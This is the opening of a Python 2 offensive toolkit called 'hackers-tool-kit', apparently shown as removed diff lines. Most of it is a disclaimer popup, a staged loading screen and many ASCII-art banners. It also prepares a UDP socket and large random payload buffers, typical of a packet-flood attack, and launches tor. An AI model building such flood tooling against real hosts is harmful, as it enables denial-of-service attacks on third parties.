██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#WARNING START# -#-------------# -from tkinter import * -win = Tk() -warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' -messageVar = Message(win, text = warn) -messageVar.config(bg='red') -messageVar.pack( ) -win.title('HTK: Warning!') -button = Button(win, text='OK', width=25, command=win.destroy) -button.pack() -win.mainloop() -#-----------# -#WARNING END# - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - 